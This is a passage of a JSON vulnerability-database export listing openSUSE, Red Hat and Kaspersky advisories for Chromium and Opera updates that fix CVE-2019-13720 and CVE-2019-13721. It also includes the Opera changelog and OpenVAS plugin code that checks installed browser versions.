"OPENSUSE-SU-2019:2421-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00001.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-04T04:05:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "This update for chromium fixes the following issues:\n\n Chromium was updated to 78.0.3904.87 boo#1155643:\n\n * 
CVE-2019-13721: Use-after-free in PDFium\n * CVE-2019-13720: Use-after-free in audio\n\n\n This update was imported from the openSUSE:Leap:15.0:Update update project.\n\n", "edition": 1, "modified": "2019-11-04T00:14:15", "published": "2019-11-04T00:14:15", "id": "OPENSUSE-SU-2019:2426-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00004.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-04T18:08:44", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "This update for chromium fixes the following issues:\n\n Chromium was updated to 78.0.3904.87 boo#1155643:\n\n * CVE-2019-13721: Use-after-free in PDFium\n * CVE-2019-13720: Use-after-free in audio\n\n\n This update was imported from the openSUSE:Leap:15.1:Update update project.\n\n", "edition": 1, "modified": "2019-11-04T15:11:31", "published": "2019-11-04T15:11:31", "id": "OPENSUSE-SU-2019:2427-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00005.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-11T15:24:29", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "This update for opera fixes the following issues:\n\n Opera was updated to version 65.0.3467.62\n\n - CHR-7658 Update chromium on desktop-stable-78-3467 to 78.0.3904.108\n - DNA-81387 Remove support for old bundle structure in signing scripts\n - DNA-81675 Update widevine signature localisation in signed packages\n - DNA-81884 [Advanced content blocking] Ads are blocked for whitelisted\n page in Incognito\n - DNA-82230 [Mac] URL is not correctly aligned when the Geolocation is ON\n - DNA-82368 Generating diffs for unsigned packages doesn\u2019t work\n - DNA-82414 Wrong number of trackers displayed just after deactivating\n adblocker\n 
- DNA-82470 [Linux] Snap package doesn\u2019t recognise GNOME 3.24 platform\n snap connection\n - DNA-82473 https://www.nba.com/standings not working with AdBlocker\n enabled\n - DNA-82484 Update content blocking icon\n - DNA-82485 [Mac 10.15] Opera installer error at the end of installation\n process\n - DNA-82508 [Adblocker] Predefault lists can not be unchecked\n - DNA-82557 Address bar dropdown launches HTTP GETs for every autocomplete\n - DNA-82596 Do not block first-party \u2018trackers\u2019\n - DNA-82616 Settings \u2013 Tracker Blocker \u2013 Add \u201cLearn more\u201d link\n - DNA-82626 [Win] High CPU usage due to media indicator animation\n - DNA-82647 Tab icons mixed after Tab closing\n - DNA-82742 Pages won\u2019t load after closing private mode\n - DNA-82768 Mark also the reference group in \u201cexp\u201d header for DNA-81658\n - DNA-82840 Disable favicon fetching for typed URLs\n\n Complete Opera 65.0 changelog at:\n\n https://blogs.opera.com/desktop/changelog-for-65/\n\n Update to version 64.0.3417.92\n\n - DNA-81358 Wrong key color on extension popup in dark mode\n - DNA-82208 Cherry-pick CVE-2019-13721 and CVE-2019-13720\n\n Update to version 64.0.3417.83\n\n - DNA-79676 Use FFmpegDemuxer to demux ADTS\n - DNA-81010 Spinner takes a lot of cpu\n - DNA-81385 Keys on some popups in dark mode can\u2019t be hovered\n - DNA-81494 [Mac] Snap onboarding doesn\u2019t appear while the icon still\n flashes\n - DNA-82003 Restore legacy path for AudioFileReader\n - DNA-82019 Enable #ffmpeg-demuxer-everywhere by default in developer\n - DNA-82028 Enable #ffmpeg-demuxer-everywhere by default in stable on macOS\n\n Update to version 64.0.3417.73\n\n - CHR-7598 Update chromium on 
desktop-stable-77-3417 to 77.0.3865.120\n - DNA-80049 The upper border of \u201cAdd to bookmarks bar\u201d popup is cut\n off in white mode\n - DNA-80395 Menu popup borders in Settings are invisible in Dark mode\n - DNA-81263 Change the continue section buttons visibility as in\n description\n - DNA-81304 Crash at chrome::NewTab(Browser*)\n - DNA-81650 Easy Setup Style looks weird\n - DNA-81708 Missing dependency on //chrome/common:buildflags\n - DNA-81732 [Mac][Catalina] Cannot maximize a window after it\u2019s been\n minimized\n - DNA-81737 Renderer crash on https://codesandbox.io/s/vanilla-ts\n - DNA-81753 Pinned tab only remembered after next restart\n - DNA-81769 Investigate reports about slow speed dial loading in O64 blog\n comments\n - DNA-81859 [Mac 10.15] Crash whenever navigating to any page\n - DNA-81893 Get Personalised news on SpeedDials broken layout\n\n Update to version 64.0.3417.61\n\n - DNA-80760 Sidebar Messenger icon update\n - DNA-81165 Remove sharing service\n - DNA-81211 [Advanced content blocking] Can not turn off ad blocking in\n private mode\n - DNA-81323 content_filter::RendererConfigProvider destroyed\n on wrong sequence\n - DNA-81487 [VPN disclaimer][da, ta] Text should be multiline\n - DNA-81545 opr-session entry for Google ads not working\n - DNA-81580 Speed dials\u2019 colours change after Opera update\n - DNA-81597 [Adblocker] Google Ads link hides if clicking\n - DNA-81639 Widevine verification status is PLATFORM_TAMPERED\n - DNA-81237 [Advanced content blocking] noCoin is not enabled by default\n - DNA-81375 Adblocking_AddToWhitelist_Popup and\n Adblocking_RemoveFromWhitelist_Popup metric not recorded in stats\n - DNA-81413 Error in console when Start Page connects to My Flow\n - DNA-81435 Adjust VPN disclaimer to longer strings [de]\n\n Update to version 64.0.3417.47\n\n - DNA-80531 [Reborn3] Unify Switches\n - 
DNA-80738 \u201cHow to protect my privacy\u201d link\n - DNA-81162 Enable #advanced-content-blocking\n on developer stream\n - DNA-81202 Privacy Protection popup doesn\u2019t resize after enabling\n blockers\n - DNA-81230 [Mac] Drop support for 10.10\n - DNA-81280 Adjust button width to the shorter string\n - DNA-81295 Opera 64 translations\n - DNA-81346 Enable #advanced-content-blocking on all streams\n - DNA-81434 Turn on #new-vpn-flow in all streams\n - DNA-81436 Import translations from Chromium to O64\n - DNA-81460 Promote O64 to stable\n - DNA-81461 Snap onboarding is cut\n - DNA-81467 Integrate missing translations (Chinese, MS and TL) to O64/65\n - DNA-81489 Start page goes into infinite loop\n\n Complete Opera 64.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-64/\n\n Update to version 63.0.3368.94\n\n - CHR-7516 Update chromium on master to 78.0.3887.7\n - DNA-80966 [Linux] Integrate a new key into our packages\n\n Update to version 63.0.3368.88\n\n - DNA-79103 Saving link to bookmarks saves it to Other bookmarks folder\n - DNA-79455 Crash at views::MenuController::\n FindNextSelectableMenuItem(views::MenuItemView*, int, views::\n MenuController::SelectionIncrementDirectionType, bool)\n - DNA-79579 Continuous packages using new_mac_bundle_structure do not run\n - DNA-79611 Update opauto_paths.py:GetResourcesDir\n - DNA-79621 Add support for new bundle structure to old autoupdate clients\n - DNA-79906 Fix package build\n - DNA-80131 Sign Opera Helper(GPU).app\n - DNA-80191 Fix\n opera_components/tracking_data/tracking_data_paths.cc\n - DNA-80638 Cherry-pick fix for CreditCardTest.\n UpdateFromImportedCard_ExpiredVerifiedCardUpdatedWithSameName\n - DNA-80801 Very slow tab deletion process\n\n", "edition": 1, "modified": "2019-12-10T12:12:16", "published": "2019-12-10T12:12:16", "id": "OPENSUSE-SU-2019:2664-1", "href": 
"http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00022.html", "title": "Security update for opera (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-07T04:02:01", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13704", "CVE-2019-5871", "CVE-2019-13714", "CVE-2019-13659", "CVE-2019-13666", "CVE-2019-13687", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-5850", "CVE-2019-5869", "CVE-2019-13686", "CVE-2019-5880", "CVE-2019-5853", "CVE-2019-13680", "CVE-2019-13664", "CVE-2019-13699", "CVE-2019-13662", "CVE-2019-13720", "CVE-2019-5877", "CVE-2019-5868", "CVE-2019-13719", "CVE-2019-13665", "CVE-2019-13674", "CVE-2019-13706", "CVE-2019-5875", "CVE-2019-5857", "CVE-2019-13678", "CVE-2019-13694", "CVE-2019-13718", "CVE-2019-13701", "CVE-2019-13679", "CVE-2019-13702", "CVE-2019-13673", "CVE-2019-13670", "CVE-2019-13713", "CVE-2019-5861", "CVE-2019-13700", "CVE-2019-5876", "CVE-2019-13671", "CVE-2019-13682", "CVE-2019-13707", "CVE-2019-13669", "CVE-2019-13681", "CVE-2019-13685", "CVE-2019-13695", "CVE-2019-5870", "CVE-2019-13717", "CVE-2019-13660", "CVE-2019-5863", "CVE-2019-5878", "CVE-2019-5854", "CVE-2019-13709", "CVE-2019-5851", "CVE-2019-13661", "CVE-2019-13721", "CVE-2019-5881", "CVE-2019-5879", "CVE-2019-13696", "CVE-2019-13703", "CVE-2019-13693", "CVE-2019-5852", "CVE-2019-13668", "CVE-2019-13663", "CVE-2019-5862", "CVE-2019-13715", "CVE-2019-13683", "CVE-2019-5872", "CVE-2019-5865", "CVE-2019-13697", "CVE-2019-15903", "CVE-2019-5867", "CVE-2019-5864", "CVE-2019-5859", "CVE-2019-13708", "CVE-2019-5860", "CVE-2019-5858", "CVE-2019-13705", "CVE-2019-13675", "CVE-2019-13710", "CVE-2019-5874", "CVE-2019-5856", "CVE-2019-13667", "CVE-2019-5855", "CVE-2019-13688", "CVE-2019-13711", "CVE-2019-13716"], "description": "This update for chromium fixes the following issues:\n\n Chromium was updated to 78.0.3904.87:\n (boo#1155643,boo#1154806,boo#1153660,\n 
boo#1151229,boo#1149143,boo#1145242,boo#1143492)\n\n Security issues fixed with this version update:\n\n * CVE-2019-13721: Use-after-free in PDFium\n * CVE-2019-13720: Use-after-free in audio\n * CVE-2019-13699: Use-after-free in media\n * CVE-2019-13700: Buffer overrun in Blink\n * CVE-2019-13701: URL spoof in navigation\n * CVE-2019-13702: Privilege elevation in Installer\n * CVE-2019-13703: URL bar spoofing\n * CVE-2019-13704: CSP bypass\n * CVE-2019-13705: Extension permission bypass\n * CVE-2019-13706: Out-of-bounds read in PDFium\n * CVE-2019-13707: File storage disclosure\n * CVE-2019-13708: HTTP authentication spoof\n * CVE-2019-13709: File download protection bypass\n * CVE-2019-13710: File download protection bypass\n * CVE-2019-13711: Cross-context information leak\n * CVE-2019-15903: Buffer overflow in expat\n * CVE-2019-13713: Cross-origin data leak\n * CVE-2019-13714: CSS injection\n * CVE-2019-13715: Address bar spoofing\n * CVE-2019-13716: Service worker state error\n * CVE-2019-13717: Notification obscured\n * CVE-2019-13718: IDN spoof\n * CVE-2019-13719: Notification obscured\n * CVE-2019-13693: Use-after-free in IndexedDB\n * CVE-2019-13694: Use-after-free in WebRTC\n * CVE-2019-13695: Use-after-free in audio\n * CVE-2019-13696: Use-after-free in V8\n * CVE-2019-13697: Cross-origin size leak.\n * CVE-2019-13685: Use-after-free in UI\n * CVE-2019-13688: Use-after-free in media\n * CVE-2019-13687: Use-after-free in media\n * CVE-2019-13686: Use-after-free in offline pages\n * CVE-2019-5870: Use-after-free in media\n * CVE-2019-5871: Heap overflow in Skia\n * CVE-2019-5872: Use-after-free in Mojo\n * CVE-2019-5874: External URIs may trigger other browsers\n * CVE-2019-5875: URL bar spoof via download redirect\n * CVE-2019-5876: Use-after-free in media\n * CVE-2019-5877: Out-of-bounds access in V8\n * CVE-2019-5878: Use-after-free in V8\n * CVE-2019-5879: Extension can bypass same origin policy\n * CVE-2019-5880: SameSite cookie bypass\n * 
CVE-2019-5881: Arbitrary read in SwiftShader\n * CVE-2019-13659: URL spoof\n * CVE-2019-13660: Full screen notification overlap\n * CVE-2019-13661: Full screen notification spoof\n * CVE-2019-13662: CSP bypass\n * CVE-2019-13663: IDN spoof\n * CVE-2019-13664: CSRF bypass\n * CVE-2019-13665: Multiple file download protection bypass\n * CVE-2019-13666: Side channel using storage size estimate\n * CVE-2019-13667: URI bar spoof when using external app URIs\n * CVE-2019-13668: Global window leak via console\n * CVE-2019-13669: HTTP authentication spoof\n * CVE-2019-13670: V8 memory corruption in regex\n * CVE-2019-13671: Dialog box fails to show origin\n * CVE-2019-13673: Cross-origin information leak using devtools\n * CVE-2019-13674: IDN spoofing\n * CVE-2019-13675: Extensions can be disabled by trailing slash\n * CVE-2019-13676: Google URI shown for certificate warning\n * CVE-2019-13677: Chrome web store origin needs to be isolated\n * CVE-2019-13678: Download dialog spoofing\n * CVE-2019-13679: User gesture needed for printing\n * CVE-2019-13680: IP address spoofing to servers\n * CVE-2019-13681: Bypass on download restrictions\n * CVE-2019-13682: Site isolation bypass\n * CVE-2019-13683: Exceptions leaked by devtools\n * CVE-2019-5869: Use-after-free in Blink\n * CVE-2019-5868: Use-after-free in PDFium ExecuteFieldAction\n * CVE-2019-5867: Out-of-bounds read in V8\n * CVE-2019-5850: Use-after-free in offline page fetcher\n * CVE-2019-5860: Use-after-free in PDFium\n * CVE-2019-5853: Memory corruption in regexp length check\n * CVE-2019-5851: Use-after-poison in offline audio context\n * CVE-2019-5859: res: URIs can load alternative browsers\n * CVE-2019-5856: Insufficient checks on filesystem: URI permissions\n * CVE-2019-5855: Integer overflow in PDFium\n * CVE-2019-5865: Site isolation bypass from compromised renderer\n * CVE-2019-5858: Insufficient filtering of Open URL service parameters\n * CVE-2019-5864: Insufficient port filtering in CORS for extensions\n * 
CVE-2019-5862: AppCache not robust to compromised renderers\n * CVE-2019-5861: Click location incorrectly checked\n * CVE-2019-5857: Comparison of -0 and null yields crash\n * CVE-2019-5854: Integer overflow in PDFium text rendering\n * CVE-2019-5852: Object leak of utility functions\n\n", "edition": 1, "modified": "2019-11-07T00:11:42", "published": "2019-11-07T00:11:42", "id": "OPENSUSE-SU-2019:2447-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00013.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2019-11-27T10:30:42", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 78.0.3904.87.\n\nSecurity Fix(es):\n\n* chromium-browser: use-after-free in audio (CVE-2019-13720)\n\n* chromium-browser: use-after-free in PDFium (CVE-2019-13721)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-11-07T12:06:23", "published": "2019-11-07T11:56:43", "id": "RHSA-2019:3775", "href": "https://access.redhat.com/errata/RHSA-2019:3775", "type": "redhat", "title": "(RHSA-2019:3775) Important: chromium-browser security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2020-09-02T11:49:23", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "### *Detect date*:\n10/31/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Google Chrome. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. 
Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nGoogle Chrome earlier than 78.0.3904.87\n\n### *Solution*:\nUpdate to the latest version \n[Google Chrome download page](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2019-13721](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13721>)0.0Unknown \n[CVE-2019-13720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13720>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2019-10-31T00:00:00", "id": "KLA11601", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11601", "title": "\r KLA11601Multiple vulnerabilities in Google Chrome ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-02T12:02:27", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "### *Detect date*:\n11/14/2019\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Opera. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. 
[More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nOpera earlier than 65.0.3467.38\n\n### *Solution*:\nUpdate to the latest version \n[Download Opera](<https://www.opera.com>)\n\n### *Original advisories*:\n[Changelog for 65](<https://blogs.opera.com/desktop/changelog-for-65/#b3467.38>) \n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Opera](<https://threats.kaspersky.com/en/product/Opera/>)\n\n### *CVE-IDS*:\n[CVE-2019-13721](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13721>)0.0Unknown \n[CVE-2019-13720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13720>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2019-11-14T00:00:00", "id": "KLA11716", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11716", "title": "\r KLA11716Multiple vulnerabilities in Opera ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-14T14:47:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "The remote host is missing an update for the ", "modified": "2020-01-13T00:00:00", "published": "2020-01-09T00:00:00", "id": "OPENVAS:1361412562310877259", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877259", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2019-688d52f9ff", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or 
(at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877259\");\n script_version(\"2020-01-13T11:49:13+0000\");\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-13 11:49:13 +0000 (Mon, 13 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 07:34:34 +0000 (Thu, 09 Jan 2020)\");\n script_name(\"Fedora Update for chromium FEDORA-2019-688d52f9ff\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC31\");\n\n script_xref(name:\"FEDORA\", value:\"2019-688d52f9ff\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EIIDTZXEBWMS5CZ6MW6PPU7EZ4VIEFZY\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the FEDORA-2019-688d52f9ff advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium is an open-source web browser, powered by WebKit (Blink).\");\n\n 
script_tag(name:\"affected\", value:\"'chromium' package(s) on Fedora 31.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC31\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~78.0.3904.87~1.fc31\", rls:\"FC31\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-29T15:31:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-11-29T00:00:00", "published": "2019-11-04T00:00:00", "id": "OPENVAS:1361412562310815824", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815824", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_31-2019-10)-Linux", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815824\");\n script_version(\"2019-11-29T08:04:17+0000\");\n script_cve_id(\"CVE-2019-13721\", \"CVE-2019-13720\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-29 08:04:17 +0000 (Fri, 29 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-04 12:00:17 +0530 (Mon, 04 Nov 2019)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_31-2019-10)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to\n\n - A use-after-free error in PDFium.\n\n - A use-after-free error in audio.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or cause a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 78.0.3904.87\n on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 78.0.3904.87 or later. 
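The Linux, macOS and Windows plugins in this record decide purely on the installed build number against 78.0.3904.87 (via version_is_less), and the Fedora and openSUSE plugins on the RPM name~version~release string (via isrpmvuln). The block below is an added example in Python, not the Greenbone plugin code and not taken from the advisories: it re-implements that version gate, including the numeric (not lexical) comparison that makes it correct, and the RPM form of the check. The helper names (version_is_less, rpm_is_vuln, assess) are ours and the sample inputs are constructed for illustration.

```python
"""Version gate for CVE-2019-13720 / CVE-2019-13721 (Chrome < 78.0.3904.87).

Added example, not code from the Greenbone/OpenVAS plugins or Kaspersky
advisories on this page; it mirrors the comparison they make. Helper names
are ours and the inputs in __main__ are constructed.
"""
import re

FIXED_VERSION = "78.0.3904.87"            # fixed build named in the advisories
CVES = ("CVE-2019-13720", "CVE-2019-13721")


def parse_version(ver):
    """'78.0.3904.87' -> (78, 0, 3904, 87). Anything after the leading dotted
    numeric run (for example a '-1.fc31' suffix) is ignored."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", ver)
    if not m:
        raise ValueError(f"unparseable version: {ver!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def version_is_less(installed, fixed=FIXED_VERSION):
    """True when installed < fixed, compared field by field as integers.
    Shorter tuples are zero-padded so '78.0' compares as '78.0.0.0'.
    A plain string comparison gets this wrong: '78.0.3904.9' > '78.0.3904.87'."""
    a, b = parse_version(installed), parse_version(fixed)
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) < b + (0,) * (n - len(b))


def _release_key(release):
    """Split an RPM release such as '1.fc31' or 'lp150.251.1' into segments so
    numeric runs compare as numbers and alphabetic runs as text."""
    return [(0, int(s)) if s.isdigit() else (1, s)
            for s in re.findall(r"\d+|[A-Za-z]+", release)]


def rpm_is_vuln(installed, fixed):
    """Package check in the name~version~release form the OpenVAS checks use,
    e.g. 'chromium~78.0.3904.70~1.fc31' against 'chromium~78.0.3904.87~1.fc31'.
    Only the same package name is compared: version first, then release."""
    try:
        n1, v1, r1 = installed.split("~")
        n2, v2, r2 = fixed.split("~")
    except ValueError:
        raise ValueError("expected name~version~release") from None
    if n1 != n2:
        return False                      # different package, no verdict
    if version_is_less(v1, v2):
        return True
    if version_is_less(v2, v1):
        return False
    return _release_key(r1) < _release_key(r2)


def assess(installed):
    """Verdict for one installed Chrome/Chromium build, in the shape a
    scanner finding would carry."""
    vulnerable = version_is_less(installed, FIXED_VERSION)
    return {"installed": installed, "fixed": FIXED_VERSION,
            "vulnerable": vulnerable, "cves": CVES if vulnerable else ()}


if __name__ == "__main__":
    # Constructed sample builds: two below the fix, the fix itself, one above.
    for v in ("78.0.3904.70", "78.0.3904.9", "78.0.3904.87", "79.0.3945.79"):
        print(assess(v))
    print(rpm_is_vuln("chromium~78.0.3904.70~1.fc31", "chromium~78.0.3904.87~1.fc31"))
```

The plugins report only when the build is strictly below 78.0.3904.87, so the fixed build itself and anything newer pass; the release comparison matters for distribution packages, where the same upstream version can ship as several package builds and only the later one carries the fix.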
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\");\n script_xref(name:\"URL\", value:\"https://www.google.com/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"78.0.3904.87\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"78.0.3904.87\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:51:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-11-03T00:00:00", "id": "OPENVAS:1361412562310852760", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852760", "type": "openvas", "title": "openSUSE: Security Advisory for chromium (openSUSE-SU-2019:2421-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published 
